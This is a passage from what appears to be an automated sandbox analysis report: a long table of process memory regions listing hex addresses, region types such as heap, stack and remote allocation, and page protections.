page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
26A8E000
|
stack
|
page read and write
|
||
1FEF1123000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
7FF70CCB9000
|
unkown
|
page read and write
|
||
7FF7E0A84000
|
unkown
|
page readonly
|
||
2990D826000
|
heap
|
page read and write
|
||
1F4530AE000
|
heap
|
page read and write
|
||
96B000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
631000
|
heap
|
page read and write
|
||
2393000
|
direct allocation
|
page read and write
|
||
92E000
|
heap
|
page read and write
|
||
217FD5AA000
|
heap
|
page read and write
|
||
236D000
|
direct allocation
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
23BBAC44000
|
heap
|
page read and write
|
||
7F5D0000
|
direct allocation
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
2250000
|
heap
|
page read and write
|
||
C8416FF000
|
stack
|
page read and write
|
||
5C5000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page execute and read and write
|
||
1DFC9630000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
166CFD70000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
1F43B02D000
|
trusted library allocation
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
27571000
|
heap
|
page read and write
|
||
996000
|
heap
|
page read and write
|
||
3DDC0000
|
heap
|
page read and write
|
||
26E94000
|
direct allocation
|
page execute and read and write
|
||
1F43B019000
|
trusted library allocation
|
page read and write
|
||
1DFC968E000
|
heap
|
page read and write
|
||
3FAEF000
|
heap
|
page read and write
|
||
2C23B41B000
|
heap
|
page read and write
|
||
22A457B0000
|
heap
|
page read and write
|
||
2871000
|
direct allocation
|
page execute and read and write
|
||
267EF000
|
stack
|
page read and write
|
||
5ED000
|
stack
|
page read and write
|
||
62A000
|
heap
|
page read and write
|
||
1FEF13A0000
|
heap
|
page read and write
|
||
265DA000
|
direct allocation
|
page read and write
|
||
3FC60000
|
heap
|
page read and write
|
||
14171330000
|
heap
|
page read and write
|
||
1F4530CA000
|
heap
|
page read and write
|
||
270EE000
|
stack
|
page read and write
|
||
9C9000
|
heap
|
page read and write
|
||
7FF6996D6000
|
unkown
|
page write copy
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
9C000
|
stack
|
page read and write
|
||
96C000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
1F438F60000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
217FD5DB000
|
heap
|
page read and write
|
||
265467B000
|
stack
|
page read and write
|
||
B882EFF000
|
stack
|
page read and write
|
||
1C7CC268000
|
heap
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
CD5A97F000
|
stack
|
page read and write
|
||
A5D000
|
heap
|
page read and write
|
||
7F3F0000
|
direct allocation
|
page read and write
|
||
1F439040000
|
heap
|
page read and write
|
||
7ED3F000
|
direct allocation
|
page read and write
|
||
141715AC000
|
heap
|
page read and write
|
||
942000
|
heap
|
page read and write
|
||
3FC75000
|
heap
|
page read and write
|
||
678000
|
heap
|
page read and write
|
||
265E1000
|
direct allocation
|
page read and write
|
||
25A1000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
44B000
|
remote allocation
|
page execute and read and write
|
||
27571000
|
heap
|
page read and write
|
||
E505CFF000
|
stack
|
page read and write
|
||
58E000
|
stack
|
page read and write
|
||
26E0101B000
|
heap
|
page read and write
|
||
237C000
|
direct allocation
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
14155060000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
8FF000
|
stack
|
page read and write
|
||
279B4000
|
direct allocation
|
page execute and read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
3FC80000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7F2C0000
|
direct allocation
|
page read and write
|
||
1417137A000
|
heap
|
page read and write
|
||
19B537D000
|
stack
|
page read and write
|
||
4C7000
|
unkown
|
page read and write
|
||
1F43AF23000
|
trusted library allocation
|
page read and write
|
||
1FEF10C0000
|
heap
|
page read and write
|
||
4C7000
|
unkown
|
page read and write
|
||
14171376000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page read and write
|
||
4C7000
|
remote allocation
|
page execute and read and write
|
||
80F000
|
stack
|
page read and write
|
||
2398000
|
direct allocation
|
page read and write
|
||
217FD5AA000
|
heap
|
page read and write
|
||
3CCAEFF000
|
stack
|
page read and write
|
||
7FF70CCB5000
|
unkown
|
page read and write
|
||
A56000
|
heap
|
page read and write
|
||
2990D836000
|
heap
|
page read and write
|
||
93A000
|
heap
|
page read and write
|
||
A8DBD8B000
|
stack
|
page read and write
|
||
2990D810000
|
heap
|
page read and write
|
||
1BD75360000
|
heap
|
page read and write
|
||
B882CFD000
|
stack
|
page read and write
|
||
24E03C1A000
|
heap
|
page read and write
|
||
618000
|
heap
|
page read and write
|
||
7FF6FEF90000
|
unkown
|
page readonly
|
||
2748000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
23A1000
|
direct allocation
|
page read and write
|
||
2990D82A000
|
heap
|
page read and write
|
||
3FCB2000
|
heap
|
page read and write
|
||
1E8921B0000
|
heap
|
page read and write
|
||
26E00F90000
|
heap
|
page read and write
|
||
7FCD8000
|
direct allocation
|
page read and write
|
||
A8DC07E000
|
stack
|
page read and write
|
||
92D000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
95B000
|
heap
|
page read and write
|
||
7FF70CCC4000
|
unkown
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
40101000
|
direct allocation
|
page execute and read and write
|
||
27571000
|
heap
|
page read and write
|
||
22A45857000
|
heap
|
page read and write
|
||
7F53F000
|
direct allocation
|
page read and write
|
||
21C513A0000
|
heap
|
page read and write
|
||
1AC39D87000
|
heap
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
908E47B000
|
stack
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
28C3000
|
direct allocation
|
page execute and read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
4A3000
|
unkown
|
page execute and read and write
|
||
26BDE000
|
stack
|
page read and write
|
||
7EEDF000
|
direct allocation
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7F548000
|
direct allocation
|
page read and write
|
||
7F4B0000
|
direct allocation
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
3E54F000
|
stack
|
page read and write
|
||
95F000
|
heap
|
page read and write
|
||
261D000
|
direct allocation
|
page read and write
|
||
26B9F000
|
stack
|
page read and write
|
||
7EDE0000
|
direct allocation
|
page read and write
|
||
86F000
|
stack
|
page read and write
|
||
26603000
|
direct allocation
|
page read and write
|
||
7ECA8000
|
direct allocation
|
page read and write
|
||
1E8920D0000
|
heap
|
page read and write
|
||
2616000
|
direct allocation
|
page read and write
|
||
14155080000
|
heap
|
page read and write
|
||
B00000
|
heap
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
92D000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
2460000
|
heap
|
page read and write
|
||
275E9000
|
heap
|
page read and write
|
||
2685F000
|
stack
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
908E4FF000
|
stack
|
page read and write
|
||
2990D82A000
|
heap
|
page read and write
|
||
3E90C000
|
stack
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
2990D85B000
|
heap
|
page read and write
|
||
7FB70000
|
direct allocation
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
24E03BE5000
|
heap
|
page read and write
|
||
986000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
26547FF000
|
stack
|
page read and write
|
||
908E2FE000
|
stack
|
page read and write
|
||
26CDB000
|
stack
|
page read and write
|
||
1AC39E60000
|
heap
|
page read and write
|
||
46A000
|
unkown
|
page write copy
|
||
265DF000
|
direct allocation
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
3FAEF000
|
heap
|
page read and write
|
||
74E000
|
heap
|
page read and write
|
||
22FE3080000
|
heap
|
page read and write
|
||
791000
|
heap
|
page read and write
|
||
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
930000
|
heap
|
page read and write
|
||
2657A000
|
direct allocation
|
page read and write
|
||
946000
|
heap
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
27087FD0000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
63F000
|
stack
|
page read and write
|
||
27518000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
5ED000
|
heap
|
page read and write
|
||
F6555FF000
|
stack
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
3FA50000
|
heap
|
page read and write
|
||
19B4EB3000
|
stack
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
3FC80000
|
heap
|
page read and write
|
||
141713AB000
|
heap
|
page read and write
|
||
3DB70000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
1C7CC24B000
|
heap
|
page read and write
|
||
141713AB000
|
heap
|
page read and write
|
||
3BFFE000
|
stack
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
1F43AF1A000
|
trusted library allocation
|
page read and write
|
||
7F4F0000
|
direct allocation
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
9C9000
|
heap
|
page read and write
|
||
27502000
|
heap
|
page read and write
|
||
26573000
|
direct allocation
|
page read and write
|
||
2743000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
2749000
|
heap
|
page read and write
|
||
3FAB1000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
141713AB000
|
heap
|
page read and write
|
||
2C475EC0000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
1F43AFAA000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page execute and read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
1BD75380000
|
heap
|
page read and write
|
||
21C51520000
|
heap
|
page read and write
|
||
924000
|
heap
|
page read and write
|
||
B23894E000
|
stack
|
page read and write
|
||
268EF000
|
stack
|
page read and write
|
||
3FA6E000
|
heap
|
page read and write
|
||
19B4FFE000
|
stack
|
page read and write
|
||
274F4000
|
heap
|
page read and write
|
||
275E9000
|
heap
|
page read and write
|
||
270880C0000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
3FA82000
|
heap
|
page read and write
|
||
1F453190000
|
heap
|
page execute and read and write
|
||
27571000
|
heap
|
page read and write
|
||
217FD5D8000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
92C000
|
heap
|
page read and write
|
||
93A000
|
heap
|
page read and write
|
||
27502000
|
heap
|
page read and write
|
||
1BD75640000
|
heap
|
page read and write
|
||
3DC80000
|
heap
|
page read and write
|
||
93A000
|
heap
|
page read and write
|
||
3DBBE000
|
stack
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
26618000
|
direct allocation
|
page read and write
|
||
14171580000
|
heap
|
page read and write
|
||
279A7000
|
direct allocation
|
page execute and read and write
|
||
27571000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
1DFC9688000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
22FE2EB0000
|
heap
|
page read and write
|
||
4701FFF000
|
stack
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
2990D83B000
|
heap
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
9C000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
27518000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
9D5000
|
heap
|
page read and write
|
||
5FE000
|
stack
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
772000
|
heap
|
page read and write
|
||
1C7CC610000
|
heap
|
page read and write
|
||
1E892360000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
966000
|
heap
|
page read and write
|
||
997000
|
heap
|
page read and write
|
||
3C01E000
|
heap
|
page read and write
|
||
166CFD20000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
1FEF1370000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
76948FF000
|
stack
|
page read and write
|
||
27518000
|
heap
|
page read and write
|
||
265E8000
|
direct allocation
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
6C0000
|
heap
|
page read and write
|
||
E50593D000
|
stack
|
page read and write
|
||
24E03B80000
|
heap
|
page read and write
|
||
14172DC0000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
19B55F6000
|
stack
|
page read and write
|
||
28BE7300000
|
heap
|
page read and write
|
||
141713AB000
|
heap
|
page read and write
|
||
276B0000
|
heap
|
page read and write
|
||
7F2D0000
|
direct allocation
|
page read and write
|
||
9CC000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
7F330000
|
direct allocation
|
page read and write
|
||
3FA51000
|
heap
|
page read and write
|
||
5ED000
|
heap
|
page read and write
|
||
74B9FF000
|
stack
|
page read and write
|
||
14155138000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
26E01305000
|
heap
|
page read and write
|
||
2747000
|
heap
|
page read and write
|
||
1F4390E0000
|
heap
|
page read and write
|
||
3C300000
|
heap
|
page read and write
|
||
2799000
|
heap
|
page read and write
|
||
1AC39BB0000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
1F43A9B0000
|
heap
|
page readonly
|
||
237D000
|
direct allocation
|
page read and write
|
||
7EDE0000
|
direct allocation
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
91E000
|
heap
|
page read and write
|
||
7EC30000
|
direct allocation
|
page read and write
|
||
7FF6996C1000
|
unkown
|
page execute read
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
706000
|
heap
|
page read and write
|
||
19B58FF000
|
stack
|
page read and write
|
||
93B000
|
heap
|
page read and write
|
||
B882DFF000
|
stack
|
page read and write
|
||
7EF2F000
|
direct allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
908E37E000
|
stack
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
273FE000
|
heap
|
page read and write
|
||
20AF000
|
stack
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
3FBF5000
|
heap
|
page read and write
|
||
3BE50000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
1C7CC470000
|
heap
|
page read and write
|
||
1FEF13AC000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
33220FE000
|
stack
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
2990D873000
|
heap
|
page read and write
|
||
94A000
|
heap
|
page read and write
|
||
274F1000
|
heap
|
page read and write
|
||
22FE2ED8000
|
heap
|
page read and write
|
||
26CDE000
|
stack
|
page read and write
|
||
21C513E3000
|
heap
|
page read and write
|
||
3BFBF000
|
stack
|
page read and write
|
||
26EAE000
|
stack
|
page read and write
|
||
22A45780000
|
heap
|
page read and write
|
||
26E1F000
|
stack
|
page read and write
|
||
263F000
|
stack
|
page read and write
|
||
19B577E000
|
stack
|
page read and write
|
||
1F439149000
|
heap
|
page read and write
|
||
7EF2F000
|
direct allocation
|
page read and write
|
||
7EF2F000
|
direct allocation
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
1FEF0F60000
|
heap
|
page read and write
|
||
24E4000
|
direct allocation
|
page read and write
|
||
4C9000
|
unkown
|
page read and write
|
||
217FEE30000
|
heap
|
page read and write
|
||
2990DA0D000
|
heap
|
page read and write
|
||
24AE000
|
direct allocation
|
page read and write
|
||
7FC80000
|
direct allocation
|
page read and write
|
||
14155415000
|
heap
|
page read and write
|
||
26FAF000
|
stack
|
page read and write
|
||
957000
|
heap
|
page read and write
|
||
3FA6E000
|
heap
|
page read and write
|
||
7EDE0000
|
direct allocation
|
page read and write
|
||
460000
|
unkown
|
page write copy
|
||
2756D000
|
heap
|
page read and write
|
||
22FE30D0000
|
heap
|
page read and write
|
||
2741000
|
heap
|
page read and write
|
||
7FF7E0A43000
|
unkown
|
page read and write
|
||
238A000
|
direct allocation
|
page read and write
|
||
7FF6996C0000
|
unkown
|
page readonly
|
||
2990F6E0000
|
trusted library allocation
|
page read and write
|
||
B238C7E000
|
stack
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
7FD5F000
|
direct allocation
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
1F453010000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
7EDE0000
|
direct allocation
|
page read and write
|
||
14171376000
|
heap
|
page read and write
|
||
26E00FC0000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
226F000
|
stack
|
page read and write
|
||
9B5000
|
heap
|
page read and write
|
||
2741000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
53E000
|
stack
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
941000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
1417137A000
|
heap
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
141713AD000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
74A000
|
heap
|
page read and write
|
||
1F43A980000
|
trusted library allocation
|
page read and write
|
||
28DC000
|
direct allocation
|
page execute and read and write
|
||
617ABFF000
|
stack
|
page read and write
|
||
24E03B60000
|
heap
|
page read and write
|
||
14155410000
|
heap
|
page read and write
|
||
2990D85B000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
1F44AF74000
|
trusted library allocation
|
page read and write
|
||
7F480000
|
direct allocation
|
page read and write
|
||
7FF7E0A40000
|
unkown
|
page readonly
|
||
2740000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
27570000
|
heap
|
page read and write
|
||
A3F000
|
stack
|
page read and write
|
||
70B000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page read and write
|
||
1F43AAA0000
|
heap
|
page read and write
|
||
1FEF1060000
|
heap
|
page read and write
|
||
931000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
2990D873000
|
heap
|
page read and write
|
||
418000
|
unkown
|
page execute and read and write
|
||
3FADD000
|
heap
|
page read and write
|
||
265E6000
|
direct allocation
|
page read and write
|
||
2645000
|
heap
|
page read and write
|
||
3FA5C000
|
heap
|
page read and write
|
||
956000
|
heap
|
page read and write
|
||
ED4C1FF000
|
stack
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
234E000
|
direct allocation
|
page read and write
|
||
2990DA05000
|
heap
|
page read and write
|
||
665000
|
heap
|
page read and write
|
||
19B4FBE000
|
stack
|
page read and write
|
||
908E67F000
|
stack
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
1FEF10DA000
|
heap
|
page read and write
|
||
98B000
|
heap
|
page read and write
|
||
7EEB0000
|
direct allocation
|
page read and write
|
||
19525FE000
|
stack
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
2C23B410000
|
heap
|
page read and write
|
||
274F8000
|
heap
|
page read and write
|
||
2756F000
|
heap
|
page read and write
|
||
2640000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
7ECB0000
|
direct allocation
|
page read and write
|
||
2508000
|
direct allocation
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
3FBBC000
|
heap
|
page read and write
|
||
27960000
|
direct allocation
|
page execute and read and write
|
||
935000
|
heap
|
page read and write
|
||
7DF4A12D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
274F1000
|
heap
|
page read and write
|
||
27516000
|
heap
|
page read and write
|
||
27457000
|
heap
|
page read and write
|
||
2990D85B000
|
heap
|
page read and write
|
||
7F5F7000
|
direct allocation
|
page read and write
|
||
28BE7465000
|
heap
|
page read and write
|
||
2749000
|
heap
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
740000
|
heap
|
page read and write
|
||
2520000
|
heap
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
748000
|
heap
|
page read and write
|
||
275F8000
|
heap
|
page read and write
|
||
26B9F000
|
stack
|
page read and write
|
||
3FB43000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
26E98000
|
direct allocation
|
page execute and read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
2990D82A000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
8AA000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
1F4530E6000
|
heap
|
page read and write
|
||
7EE70000
|
direct allocation
|
page read and write
|
||
3C280000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
473000
|
system
|
page execute and read and write
|
||
5F0000
|
heap
|
page read and write
|
||
3C042000
|
heap
|
page read and write
|
||
2384000
|
direct allocation
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
4A3000
|
remote allocation
|
page execute and read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
22FE30E0000
|
heap
|
page read and write
|
||
27088200000
|
heap
|
page read and write
|
||
3FAC9000
|
heap
|
page read and write
|
||
19B527E000
|
stack
|
page read and write
|
||
7FD70000
|
direct allocation
|
page read and write
|
||
166CFEC0000
|
heap
|
page read and write
|
||
266EA000
|
stack
|
page read and write
|
||
936000
|
heap
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
141715A5000
|
heap
|
page read and write
|
||
1DFC96A3000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7FF6FEF9B000
|
unkown
|
page readonly
|
||
93F000
|
stack
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
1F4390B5000
|
heap
|
page read and write
|
||
24E03C10000
|
heap
|
page read and write
|
||
265C4000
|
direct allocation
|
page read and write
|
||
2990D858000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
946000
|
heap
|
page read and write
|
||
217FD5B6000
|
heap
|
page read and write
|
||
928000
|
heap
|
page read and write
|
||
1F4391B1000
|
heap
|
page read and write
|
||
3DB5E000
|
stack
|
page read and write
|
||
9A9000
|
heap
|
page read and write
|
||
259A000
|
direct allocation
|
page read and write
|
||
3FCB1000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
2754C000
|
heap
|
page read and write
|
||
94B000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
2796F000
|
direct allocation
|
page execute and read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
1415514A000
|
heap
|
page read and write
|
||
4C7000
|
unkown
|
page execute and read and write
|
||
1F4531C0000
|
heap
|
page read and write
|
||
74BAFF000
|
stack
|
page read and write
|
||
7FFD9B9A3000
|
trusted library allocation
|
page execute and read and write
|
||
1F43AF01000
|
trusted library allocation
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
2633000
|
direct allocation
|
page read and write
|
||
1BD753CB000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
26A5F000
|
stack
|
page read and write
|
||
1FEF2AC0000
|
heap
|
page read and write
|
||
217FD4FC000
|
heap
|
page read and write
|
||
4B9000
|
remote allocation
|
page execute and read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
27570000
|
heap
|
page read and write
|
||
7FFD9BB82000
|
trusted library allocation
|
page read and write
|
||
7FF6996D6000
|
unkown
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
1F43B428000
|
trusted library allocation
|
page read and write
|
||
1E892283000
|
heap
|
page read and write
|
||
9B4000
|
heap
|
page read and write
|
||
26E60000
|
remote allocation
|
page read and write
|
||
4701EFF000
|
stack
|
page read and write
|
||
1C7CC450000
|
heap
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
3F7BF000
|
stack
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
58E000
|
stack
|
page read and write
|
||
929000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
3E58E000
|
stack
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
2360000
|
direct allocation
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
1F43B016000
|
trusted library allocation
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
400000
|
system
|
page execute and read and write
|
||
3FA51000
|
heap
|
page read and write
|
||
7FF6FEF90000
|
unkown
|
page readonly
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
6E0000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
4C0000
|
remote allocation
|
page execute and read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
540000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
ED4C2FF000
|
stack
|
page read and write
|
||
1F43AAA5000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
7F450000
|
direct allocation
|
page read and write
|
||
93B000
|
heap
|
page read and write
|
||
28BE7400000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
4B1000
|
unkown
|
page execute and read and write
|
||
947000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
217FD5CE000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
270880CA000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
2717A000
|
heap
|
page read and write
|
||
458000
|
unkown
|
page execute read
|
||
24CE000
|
stack
|
page read and write
|
||
7EE58000
|
direct allocation
|
page read and write
|
||
2748000
|
heap
|
page read and write
|
||
268E000
|
stack
|
page read and write
|
||
98A000
|
heap
|
page read and write
|
||
274FE000
|
heap
|
page read and write
|
||
141713A8000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
1F453039000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
930000
|
heap
|
page read and write
|
||
2C475CB0000
|
heap
|
page read and write
|
||
141715A0000
|
heap
|
page read and write
|
||
1FEF10E7000
|
heap
|
page read and write
|
||
26611000
|
direct allocation
|
page read and write
|
||
7EE5F000
|
direct allocation
|
page read and write
|
||
1F43B2E6000
|
trusted library allocation
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
27570000
|
heap
|
page read and write
|
||
693000
|
heap
|
page read and write
|
||
2756F000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
34C8FD000
|
stack
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
14171368000
|
heap
|
page read and write
|
||
3E40F000
|
stack
|
page read and write
|
||
3E80C000
|
stack
|
page read and write
|
||
2756F000
|
heap
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
7F4AF000
|
direct allocation
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
7FF7E0A30000
|
unkown
|
page readonly
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
93A000
|
